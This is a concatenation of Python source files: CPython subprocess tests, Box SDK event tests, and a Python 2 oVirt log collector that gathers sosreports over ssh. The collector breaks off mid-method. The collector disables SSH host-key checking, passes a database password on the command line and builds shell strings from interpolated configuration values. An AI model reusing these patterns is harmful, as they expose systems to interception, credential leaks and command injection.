self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
        # Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp", "fcntl"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
test_events.py
|
# coding: utf-8
from threading import Event, Thread
import pytest
import requests
from boxsdk.object.folder import FolderSyncState
from boxsdk.object.event import Event as BoxEvent
@pytest.fixture
def box_events(box_client):
return box_client.events()
@pytest.fixture
def move_target(box_client):
return box_client.folder('0').create_subfolder('move target')
@pytest.fixture
def copy_target(box_client):
return box_client.folder('0').create_subfolder('copy target')
@pytest.fixture
def assert_event(box_events):
# pylint:disable=redefined-outer-name
def helper(get_item, event_type, stream_position=0):
item = get_item()
events = box_events.get_events(stream_position=stream_position)['entries']
assert len(events) == 1
event = events[0]
assert event['event_type'] == event_type
assert event['source']['name'] == item.name
assert event['source']['id'] == item.id
assert isinstance(event, BoxEvent)
return helper
def test_get_long_poll_url(box_client):
options = box_client.events().get_long_poll_options()
with pytest.raises(requests.Timeout):
requests.get(options['url'], timeout=0.11)
def test_upload_causes_upload_event(uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file, 'ITEM_UPLOAD')
def test_create_folder_causes_create_event(created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder, 'ITEM_CREATE')
def test_move_file_causes_move_event(box_events, move_target, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file.move(move_target), 'ITEM_MOVE', box_events.get_latest_stream_position())
def test_move_folder_causes_move_event(box_events, move_target, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder.move(move_target), 'ITEM_MOVE', box_events.get_latest_stream_position())
def test_rename_file_causes_rename_event(box_events, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
updated_name = 'updated_{0}'.format(uploaded_file.name)
assert_event(lambda: uploaded_file.rename(updated_name), 'ITEM_RENAME', box_events.get_latest_stream_position())
def test_rename_folder_causes_rename_event(box_events, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
updated_name = 'updated_{0}'.format(created_subfolder.name)
assert_event(lambda: created_subfolder.rename(updated_name), 'ITEM_RENAME', box_events.get_latest_stream_position())
def test_copy_file_causes_copy_event(box_events, copy_target, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file.copy(copy_target), 'ITEM_COPY', box_events.get_latest_stream_position())
def test_copy_folder_causes_copy_event(box_events, copy_target, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder.copy(copy_target), 'ITEM_COPY', box_events.get_latest_stream_position())
@pytest.mark.xfail(reason='trash event has no source')
def test_delete_file_causes_trash_event(box_events, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(uploaded_file.delete, 'ITEM_TRASH', box_events.get_latest_stream_position())
@pytest.mark.xfail(reason='trash event has no source')
def test_delete_folder_causes_trash_event(box_events, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(created_subfolder.delete, 'ITEM_TRASH', box_events.get_latest_stream_position())
@pytest.mark.parametrize('sync_state,event_type', [
(FolderSyncState.IS_SYNCED, 'ITEM_SYNC'),
(FolderSyncState.NOT_SYNCED, 'ITEM_UNSYNC'),
])
def test_sync_folder_causes_sync_event(box_events, created_subfolder, assert_event, sync_state, event_type):
# pylint:disable=redefined-outer-name
assert_event(
lambda: created_subfolder.update_sync_state(sync_state.value),
event_type,
box_events.get_latest_stream_position(),
)
@pytest.fixture
def long_poll_generator(box_events, uploaded_file, request):
# pylint:disable=redefined-outer-name
generator = box_events.generate_events_with_long_polling(stream_position=0)
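    # The long-poll generator is drained on a background thread: event_ready
    # signals the test that a new event was appended to long_poll_thread.events,
    # and consumed_events lets the test release the thread to fetch the next one.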
def long_poll():
for event in generator:
long_poll_thread.events.append(event)
long_poll_thread.event_ready.set()
if long_poll_thread.should_stop_polling:
return
long_poll_thread.consumed_events.wait()
long_poll_thread.consumed_events.clear()
long_poll_thread = Thread(target=long_poll)
long_poll_thread.should_stop_polling = False
long_poll_thread.events = []
long_poll_thread.event_ready = Event()
long_poll_thread.consumed_events = Event()
long_poll_thread.start()
def fin():
long_poll_thread.should_stop_polling = True
uploaded_file.delete()
long_poll_thread.event_ready.wait()
generator.close()
long_poll_thread.join()
request.addfinalizer(fin)
return long_poll_thread
def test_generate_events_with_long_polling(long_poll_generator, created_subfolder, uploaded_file):
# pylint:disable=redefined-outer-name
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
assert not long_poll_generator.event_ready.wait(timeout=0.01)
assert len(long_poll_generator.events) == 2
folder_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'folder')
file_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'file')
assert folder_event['event_type'] == 'ITEM_CREATE'
assert file_event['event_type'] == 'ITEM_UPLOAD'
assert folder_event['source']['id'] == created_subfolder.id
assert file_event['source']['id'] == uploaded_file.id
assert folder_event['source']['name'] == created_subfolder.name
assert file_event['source']['name'] == uploaded_file.name
del long_poll_generator.events[:]
uploaded_file.rename('updated_{0}'.format(uploaded_file.name))
created_subfolder.rename('updated_{0}'.format(created_subfolder.name))
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
assert not long_poll_generator.event_ready.wait(timeout=0.01)
assert len(long_poll_generator.events) == 2
folder_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'folder')
file_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'file')
assert folder_event['event_type'] == 'ITEM_RENAME'
assert file_event['event_type'] == 'ITEM_RENAME'
assert folder_event['source']['id'] == created_subfolder.id
assert file_event['source']['id'] == uploaded_file.id
assert folder_event['source']['name'] == 'updated_{0}'.format(created_subfolder.name)
assert file_event['source']['name'] == 'updated_{0}'.format(uploaded_file.name)
|
logcollector.py
|
#!/usr/bin/python
import sys
import os
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
import subprocess
import shlex
import urllib
import urllib2
import base64
import pprint
import fnmatch
import traceback
import tempfile
import shutil
import logging
import getpass
from schemas import hypervisors
versionNum="1.0.0"
STREAM_LOG_FORMAT = '%(levelname)s: %(message)s'
FILE_LOG_FORMAT = '%(asctime)s::%(levelname)s::%(module)s::%(lineno)d::%(name)s:: %(message)s'
FILE_LOG_DSTMP = '%Y-%m-%d %H:%M:%S'
DEFAULT_SSH_KEY = "/etc/pki/ovirt-engine/keys/engine_id_rsa"
DEFAULT_SSH_USER = 'root'
DEFAULT_CONFIGURATION_FILE = "/etc/ovirt-engine/logcollector.conf"
DEFAULT_SCRATCH_DIR='/tmp/logcollector'
DEFAULT_LOG_FILE='/var/log/ovirt-engine/engine-log-collector.log'
DEFAULT_TIME_SHIFT_FILE='time_diff.txt'
def multilog(logger, msg):
for line in str(msg).splitlines():
logger(line)
def get_from_prompt(msg, default=None, prompter=raw_input):
try:
value = prompter(msg)
if value.strip():
return value.strip()
else:
return default
except EOFError:
print
return default
class ExitCodes():
"""
    A simple pseudo-enumeration class to hold the current and future exit codes
"""
NOERR=0
CRITICAL=1
WARN=2
exit_code=NOERR
class Caller(object):
"""
Utility class for forking programs.
"""
def __init__(self, configuration):
self.configuration = configuration
def prep(self, cmd):
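        # Fill the %(key)s placeholders in the command template from the
        # configuration dict, then split it into an argument list for subprocess.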
_cmd = cmd % self.configuration
return shlex.split(_cmd)
def call(self, cmds):
"""Uses the configuration to fork a subprocess and run cmds."""
_cmds = self.prep(cmds)
proc = subprocess.Popen(_cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
returncode = proc.returncode
logging.debug("returncode(%s)" % returncode)
logging.debug("STDOUT(%s)" % stdout)
logging.debug("STDERR(%s)" % stderr)
if returncode == 0:
return stdout
else:
raise Exception(stderr)
class Configuration(dict):
"""This class is a dictionary subclass that knows how to read and """
"""handle our configuration. Resolution order is defaults -> """
"""configuration file -> command line options."""
class SkipException(Exception):
"This exception is raised when the user aborts a prompt"
pass
def __init__(self,
parser=None):
self.command = "list"
self.parser = parser
self.options = None
self.args = None
# Immediately, initialize the logger to the INFO log level and our
# logging format which is <LEVEL>: <MSG> and not the default of
        # <LEVEL>:<UID>: <MSG>
self.__initLogger(logging.INFO)
if not parser:
raise Exception("Configuration requires a parser")
self.options, self.args = self.parser.parse_args()
if os.geteuid() != 0:
raise Exception("This tool requires root permissions to run.")
# At this point we know enough about the command line options
# to test for verbose and if it is set we should re-initialize
# the logger to DEBUG. This will have the effect of printing
# stack traces if there are any exceptions in this class.
if getattr(self.options, "verbose"):
self.__initLogger(logging.DEBUG)
self.load_config_file()
if self.options:
# Need to parse again to override conf file options
self.options, self.args = self.parser.parse_args(values=self.options)
self.from_options(self.options, self.parser)
# Need to parse out options from the option groups.
self.from_option_groups(self.options, self.parser)
if self.args:
self.from_args(self.args)
# Finally, all options from the command line and possibly a configuration
# file have been processed. We need to re-initialize the logger if
        # the user has supplied either --quiet or a --log-file.
# This will ensure that any further log messages throughout the lifecycle
# of this program go to the log handlers that the user has specified.
if self.options.log_file or self.options.quiet:
level = logging.INFO
if self.options.verbose:
level = logging.DEBUG
self.__initLogger(level, self.options.quiet, self.options.log_file)
def __missing__(self, key):
return None
def load_config_file(self):
"""Loads the user-supplied config file or the system default.
If the user supplies a bad filename we will stop."""
if self.options and getattr(self.options, "conf_file"):
if os.path.isfile(self.options.conf_file):
self.from_file(self.options.conf_file)
else:
raise Exception("The specified configuration file does not exist. File=(%s)" %
self.options.conf_file)
elif os.path.isfile(DEFAULT_CONFIGURATION_FILE):
self.from_file(DEFAULT_CONFIGURATION_FILE)
def from_option_groups(self,options,parser):
for optGrp in parser.option_groups:
for optGrpOpts in optGrp.option_list:
opt_value = getattr(options, optGrpOpts.dest)
if opt_value is not None:
self[optGrpOpts.dest] = opt_value
def from_options(self, options, parser):
for option in parser.option_list:
if option.dest:
opt_value = getattr(options, option.dest)
if opt_value is not None:
self[option.dest] = opt_value
def from_file(self, filename):
import ConfigParser
cp = ConfigParser.ConfigParser()
cp.read(filename)
# we want the items from the LogCollector section only
try:
opts = ["--%s=%s" % (k,v)
for k,v in cp.items("LogCollector")]
(new_options, args) = self.parser.parse_args(args=opts, values=self.options)
self.from_option_groups(new_options, self.parser)
self.from_options(new_options, self.parser)
except ConfigParser.NoSectionError:
pass
def from_args(self, args):
self.command = args[0]
if self.command not in ('list', 'collect'):
raise Exception("%s is not a valid command." % self.command)
def prompt(self, key, msg):
if key not in self:
self._prompt(raw_input, key, msg)
def getpass(self, key, msg):
if key not in self:
self._prompt(getpass.getpass, key, msg)
# This doesn't ask for CTRL+C to abort because KeyboardInterrupts don't
# seem to behave the same way every time. Take a look at the link:
# http://stackoverflow.com/questions/4606942/why-cant-i-handle-a-keyboardinterrupt-in-python
def _prompt(self, prompt_function, key, msg=None):
value = get_from_prompt(msg="Please provide the %s (CTRL+D to skip): " % msg,
prompter=prompt_function)
if value:
self[key] = value
else:
raise self.SkipException
def ensure(self, key, default=""):
if key not in self:
self[key] = default
def has_all(self, *keys):
return all(self.get(key) for key in keys)
def has_any(self, *keys):
return any(self.get(key) for key in keys)
def __ensure_path_to_file(self, file_):
dir_ = os.path.dirname(file_)
if not os.path.exists(dir_):
logging.info("%s does not exists. It will be created." % dir_)
os.makedirs(dir_, 0755)
def __log_to_file(self, file_, level):
try:
self.__ensure_path_to_file(file_)
hdlr = logging.FileHandler(filename=file_, mode='w')
fmt = logging.Formatter(FILE_LOG_FORMAT, FILE_LOG_DSTMP)
hdlr.setFormatter(fmt)
logging.root.addHandler(hdlr)
logging.root.setLevel(level)
except Exception, e:
logging.error("Could not configure file logging: %s" % e)
def __log_to_stream(self, level):
sh = logging.StreamHandler()
fmt = logging.Formatter(STREAM_LOG_FORMAT)
sh.setLevel(level)
sh.setFormatter(fmt)
logging.root.addHandler(sh)
def __initLogger(self, logLevel=logging.INFO, quiet=None, logFile=None):
"""
Initialize the logger based on information supplied from the
command line or configuration file.
"""
# If you call basicConfig more than once without removing handlers
# it is effectively a noop. In this program it is possible to call
# __initLogger more than once as we learn information about what
# options the user has supplied in either the config file or
# command line; hence, we will need to load and unload the handlers
        # to ensure consistently formatted output.
log = logging.getLogger()
for h in log.handlers:
log.removeHandler(h)
if quiet:
if logFile:
# Case: Batch and log file supplied. Log to only file
self.__log_to_file(logFile, logLevel)
else:
# If the user elected quiet mode *and* did not supply
# a file. We will be *mostly* quiet but not completely.
# If there is an exception/error/critical we will print
# to stdout/stderr.
logging.basicConfig(level=logging.ERROR, format=STREAM_LOG_FORMAT)
else:
if logFile:
# Case: Not quiet and log file supplied. Log to both file and
# stdout/stderr
self.__log_to_file(logFile, logLevel)
self.__log_to_stream(logLevel)
else:
# Case: Not quiet and no log file supplied. Log to only stdout/stderr
logging.basicConfig(level=logLevel, format=STREAM_LOG_FORMAT)
class CollectorBase(object):
def __init__(self,
hostname,
configuration=None,
**kwargs):
self.hostname = hostname
if configuration:
self.configuration = configuration.copy()
else:
self.configuration = {}
self.prep()
self.caller = Caller(self.configuration)
def prep(self):
self.configuration['ssh_cmd'] = self.format_ssh_command()
self.configuration['scp_cmd'] = self.format_ssh_command(cmd="scp")
def get_key_file(self):
return self.configuration.get("key_file")
def get_ssh_user(self):
return "%s@" % DEFAULT_SSH_USER
def parse_sosreport_stdout(self, stdout):
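        # Scan the sosreport output for the generated tarball path and the
        # "The md5sum is ..." line, storing filename, path and checksum in the
        # configuration.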
def reportFinder(line):
if fnmatch.fnmatch(line, '*sosreport-*tar*'):
return line
else:
return None
def md5Finder(line):
if fnmatch.fnmatch(line, 'The md5sum is*'):
return line
else:
return None
try:
lines = stdout.splitlines()
fileAry = filter(reportFinder,lines)
if fileAry is not None:
if len(fileAry) > 0 and fileAry[0] is not None:
path = fileAry[0].strip()
filename = os.path.basename(path)
self.configuration["filename"] = filename
if os.path.isabs(path):
self.configuration["path"] = path
else:
self.configuration["path"] = os.path.join(self.configuration["local_tmp_dir"], filename)
else:
self.configuration["filename"] = None
self.configuration["path"] = None
else:
self.configuration["filename"] = None
self.configuration["path"] = None
fileAry = filter(md5Finder,lines)
if fileAry is not None and len(fileAry) > 0:
if fileAry[0] is not None:
md5sum = fileAry[0].partition(": ")[-1]
self.configuration["checksum"] = md5sum
else:
self.configuration["checksum"] = None
else:
self.configuration["checksum"] = None
logging.debug("filename(%s)" % self.configuration["filename"])
logging.debug("path(%s)" % self.configuration["path"])
logging.debug("checksum(%s)" % self.configuration["checksum"])
except IndexError, e:
logging.debug("message(%s)" % e)
logging.debug("parse_sosreport_stdout: " + traceback.format_exc())
raise Exception("Could not parse sosreport output to determine filename")
def format_ssh_command(self, cmd="ssh"):
cmd = "/usr/bin/%s " % cmd
if "ssh_port" in self.configuration:
port_flag = "-p" if cmd.startswith("/usr/bin/ssh") else "-P"
cmd += port_flag + " %(ssh_port)s " % self.configuration
if self.get_key_file():
cmd += "-i %s " % self.get_key_file()
# ignore host key checking
cmd += "-oStrictHostKeyChecking=no "
cmd += self.get_ssh_user()
return cmd + "%s" % self.hostname
class HyperVisorData(CollectorBase):
def __init__(self,
hostname,
configuration=None,
semaphore=None,
queue=None,
**kwargs):
super(HyperVisorData, self).__init__(hostname,configuration)
self.semaphore = semaphore
self.queue = queue
def prep(self):
self.configuration["hostname"] = self.hostname
self.configuration['ssh_cmd'] = self.format_ssh_command()
self.configuration['scp_cmd'] = self.format_ssh_command(cmd="scp")
self.configuration['reports'] = ",".join((
"libvirt",
"vdsm",
"general",
"networking",
"hardware",
"process",
"yum",
"filesys",
"devicemapper",
"selinux",
"kernel",
))
# these are the reports that will work with rhev2.2 hosts
self.configuration['bc_reports'] = "vdsm,general,networking,hardware,process,yum,filesys"
def get_time_diff(self, stdout):
import datetime
h_time = datetime.datetime.strptime(
stdout.strip(), "%a, %d %b %Y %H:%M:%S +0000")
l_time = datetime.datetime.utcnow()
logging.debug("host <%s> time: %s" % (self.configuration["hostname"], h_time.isoformat()))
logging.debug("local <%s> time: %s" % ("localhost", l_time.isoformat(),))
time_diff = "%(hostname)s " % self.configuration
if h_time > l_time:
self.queue.append(time_diff + "+%s" % (h_time - l_time))
else:
self.queue.append(time_diff + "-%s" % (l_time - h_time))
def sosreport(self):
cmd = """%(ssh_cmd)s "
VERSION=`/bin/rpm -q --qf '[%%{VERSION}]' sos | /bin/sed 's/\.//'`;
if [ "$VERSION" -ge "22" ]; then
/usr/sbin/sosreport --batch -o %(reports)s
elif [ "$VERSION" -ge "17" ]; then
/usr/sbin/sosreport --no-progressbar -o %(bc_reports)s
else
/bin/echo "No valid version of sosreport found." 1>&2
exit 1
fi
"
"""
return self.caller.call(cmd)
def run(self):
try:
logging.info("collecting information from %(hostname)s" % self.configuration)
stdout = self.sosreport()
self.parse_sosreport_stdout(stdout)
self.configuration["hypervisor_dir"] = os.path.join(self.configuration.get("local_scratch_dir"),self.configuration.get("hostname"))
os.mkdir(self.configuration["hypervisor_dir"])
self.configuration['archive_name'] = self.configuration.get("hostname") + "-" + os.path.basename(self.configuration.get("path"))
self.caller.call('%(scp_cmd)s:%(path)s %(hypervisor_dir)s/%(archive_name)s')
self.caller.call('%(ssh_cmd)s "/bin/rm %(path)s*"')
# setting up a pipeline since passing stdin to communicate doesn't seem to work
echo_cmd = self.caller.prep('/bin/echo "%(checksum)s %(hypervisor_dir)s/%(archive_name)s"')
md5sum_cmd = self.caller.prep("/usr/bin/md5sum -c -")
result = None
p1 = subprocess.Popen(echo_cmd, stdout=subprocess.PIPE)
p2 = subprocess.Popen(md5sum_cmd, stdin=p1.stdout, stdout=subprocess.PIPE)
result = p2.communicate()[0]
stdout = self.caller.call('%(ssh_cmd)s "/bin/date -uR"')
try:
self.get_time_diff(stdout)
except ValueError, e:
logging.debug("get_time_diff: " + str(e))
if result and "OK" not in result:
logging.error("checksum test: " + result)
raise Exception("%(local_scratch_dir)s/%(filename)s failed checksum test!" % self.configuration)
except Exception, e:
ExitCodes.exit_code=ExitCodes.WARN
logging.error("Failed to collect logs from: %s; %s" % (self.configuration.get("hostname"), e))
multilog(logging.debug,traceback.format_exc())
logging.debug("Configuration for %(hostname)s:" % self.configuration)
multilog(logging.debug,pprint.pformat(self.configuration))
finally:
if self.semaphore:
self.semaphore.release()
logging.info("finished collecting information from %(hostname)s" % self.configuration)
class ENGINEData(CollectorBase):
def build_options(self):
opts = ["-k rpm.rpmva=off",
"-k engine.vdsmlogs=%s" % self.configuration.get("local_scratch_dir"),
"-k engine.prefix=on"]
for key, value in self.configuration.iteritems():
if key.startswith("java") or key.startswith("jboss"):
opts.append('-k %s="%s"' % (key,value))
if self.configuration.get("ticket_number"):
opts.append("--ticket-number=%s" % self.configuration.get("ticket_number"))
if self.configuration.get("upload"):
opts.append("--upload=%s" % self.configuration.get("upload"))
return " ".join(opts)
def sosreport(self):
self.configuration["reports"] = ",".join((
"jboss",
"engine",
"rpm",
"libvirt",
"general",
"networking",
"hardware",
"process",
"yum",
"filesys",
"devicemapper",
"selinux",
"kernel",
))
self.configuration["sos_options"] = self.build_options()
stdout = self.caller.call('/usr/sbin/sosreport --batch --report --tmp-dir=%(local_tmp_dir)s -o %(reports)s %(sos_options)s')
self.parse_sosreport_stdout(stdout)
if os.path.exists(self.configuration["path"]):
archiveSize = '%.1fM' % (float(os.path.getsize(self.configuration["path"])) / (1 << 20))
else:
archiveSize = None
return """Log files have been collected and placed in %s.
The MD5 for this file is %s and its size is %s""" % (
self.configuration["path"] ,
self.configuration["checksum"],
archiveSize)
class PostgresData(CollectorBase):
def get_key_file(self):
"""
Override the base get_key_file method to return the SSH key for the
PostgreSQL system if there is one. Returns None if there isn't one.
"""
return self.configuration.get("pg_host_key")
def get_ssh_user(self):
"""
Override the base get_ssh_user method to return the SSH user for the
PostgreSQL system if there is one.
"""
if self.configuration.get("pg_ssh_user"):
return "%s@" % self.configuration.get("pg_ssh_user")
else:
return "%s@" % DEFAULT_SSH_USER
def sosreport(self):
if self.configuration.get("pg_pass"):
opt = '-k postgresql.dbname=%(pg_dbname)s -k postgresql.username=%(pg_user)s -k postgresql.password=%(pg_pass)s'
else:
opt = ""
if self.hostname == "localhost":
stdout = self.caller.call('/usr/sbin/sosreport --batch --report -o postgresql '
'--tmp-dir=%(local_scratch_dir)s ' + opt)
self.parse_sosreport_stdout(stdout)
# Prepend postgresql- to the .md5 file that is produced by SOS
# so that it is easy to distinguish from the other N reports
# that are all related to hypervisors. Note that we
# only do this in the case of a local PostgreSQL DB because
# when the DB is remote the .md5 file is not copied.
os.rename("%s.md5" % (self.configuration["path"]),
os.path.join(self.configuration["local_scratch_dir"],
"postgresql-%s.md5" % self.configuration["filename"]))
else:
# The PG database is on a remote host
cmd = '%(ssh_cmd)s "/usr/sbin/sosreport --batch --report -o postgresql ' + opt
stdout = self.caller.call(cmd)
self.parse_sosreport_stdout(stdout)
self.caller.call('%(scp_cmd)s:%(path)s %(local_scratch_dir)s')
self.caller.call('%(ssh_cmd)s "rm %(path)s*"')
# Prepend postgresql- to the PostgreSQL SOS report
# so that it is easy to distinguish from the other N reports
